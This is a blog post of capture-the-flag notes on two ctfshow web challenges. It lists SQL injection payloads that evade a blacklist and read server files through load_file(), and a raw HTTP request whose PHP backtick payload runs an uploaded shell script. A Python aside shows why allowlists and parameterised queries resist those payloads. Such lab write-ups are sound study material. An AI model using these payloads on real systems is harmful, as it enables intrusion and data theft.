note-23

ctfshow_web14

At first I also tried passing c, but only went up to 2, then assumed it was a source-code bypass; after reading a writeup I found it was SQL injection.
Had I tried up to 3 I would have found this page myself...
/here_1s_your_f1ag.php
Pressing F12 revealed:

if(preg_match('/information_schema.tables|information_schema.columns|linestring| |polygon/is', $_GET['query'])){
    die('@A@');
}

information_schema is blocked, so I guessed this is column-name-less injection (无列名注入).

1'union/**/select/**/database()

1&&sleep(5)

String injection

1&&order/**/by/**/1

0/**/union/**/select/**/database()

Testing showed it is string injection.

0/**/union/**/select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database()

0/**/union/**/select/**/@@version

//alert('10.2.26-MariaDB-log')

0/**/union/**/select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats
//alert('gtid_slave_pos,content')

0/**/union/**/select/**/group_concat(*)/**/from/**/gtid_slave_pos

0/**/union/**/select/**/group_concat(1,2,3)/**/from/**/content

0/**/union/**/select/**/*/**/from/**/content

0/**/union/**/select/**/load_file/**/

Trying column-name-less injection

0/**/union/**/select/**/group_concat(1,2,3)/**/from/**/(select/**/1,2,3/**/from/**/content)

0/**/select/**/1,2,3/**/union/**/select/**/*/**/from/**/content#

0/**/union/**/select/**/group_concat(1,2,3)/**/from/**/content

// echoes (123,123,123,123), nothing useful

Reading the writeup: https://blog.csdn.net/m0_55923820/article/details/118783171
So SQL can also load files.
Learned something new.

0/**/union/**/select/**/load_file('/var/www/html/secret.php')

0/**/union/**/select/**/load_file('/tmp/gtf1y')

0/**/union/**/select/**/load_file('/tmp/gtf1y/real_flag_is_here')

0/**/union/**/select/**/load_file('/real_flag_is_here')
// didn't expect it to be read directly from '/real_flag_is_here'
//alert('ctfshow{dd04abdc-9d55-4d0d-8d2d-f616f7b82caa}')

There is a writeup version that uses column-name-less injection, but I couldn't get it to work in my environment:
https://www.zxcms.com/content/3fcqbuf331l6p0.html
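To make the weakness of that filter concrete, here is an added example (not code from the write-up or the challenge) that reproduces the preg_match blacklist in Python, runs the write-up's own payloads against it, and contrasts it with an allowlist plus a parameterised query; the sqlite table and its rows are a constructed stand-in for the challenge's content table.

```python
import re
import sqlite3

# The blacklist from the challenge's here_1s_your_f1ag.php, with the same
# alternatives and the PHP /is flags (case-insensitive, dot matches newline).
BLACKLIST = re.compile(
    r"information_schema.tables|information_schema.columns|linestring| |polygon",
    re.IGNORECASE | re.DOTALL,
)

# Payloads taken from the write-up above. None contains a literal space or
# the two blacklisted table names, so the filter lets every one of them through.
WRITEUP_PAYLOADS = [
    "1'union/**/select/**/database()",
    "0/**/union/**/select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats",
    "0/**/union/**/select/**/load_file('/real_flag_is_here')",
]


def blacklist_blocks(query: str) -> bool:
    """True when the challenge's preg_match would fire and die('@A@')."""
    return BLACKLIST.search(query) is not None


def allowlist_id(query: str):
    """Allowlist instead of blacklist: the page only ever needs a small integer
    id, so accept digits only and return the int; anything else yields None."""
    return int(query) if re.fullmatch(r"\d{1,9}", query) else None


def lookup(conn: sqlite3.Connection, query: str):
    """Parameterised lookup: the user value is bound, never spliced into SQL."""
    id_ = allowlist_id(query)
    if id_ is None:
        return None
    row = conn.execute("SELECT val FROM content WHERE id = ?", (id_,)).fetchone()
    return row[0] if row else None


def demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's content table (sqlite, not MariaDB)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, val TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)",
                     [(1, "one"), (2, "two"), (3, "three")])
    return conn
```

Every write-up payload returns False from blacklist_blocks but None from allowlist_id, which is the whole difference between the two approaches.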

ctfshow red-packet challenge, round two

This one is pretty impressive.

https://www.cnblogs.com/wssw/p/18115718
The leading ?> closes the preceding statement.
<?= is the shorthand alias for echo().

POST /?cmd=?%3E%3C?=`.%20/??p/p?p??????`; HTTP/1.1
Host: 6fd1fc97-dca5-4a94-8065-2622d4c7ed8d.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------114514
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: UM_distinctid=1739f845e394-0cffbf96840b0c8-4c302d7c-144000-1739f845e3b4e2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 245

-----------------------------114514
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/bash

cat /flag.txt
-----------------------------114514--

https://aidemofashi.github.io/2025/04/10/note-23/
Author: aidemofashi
Published on 10 April 2025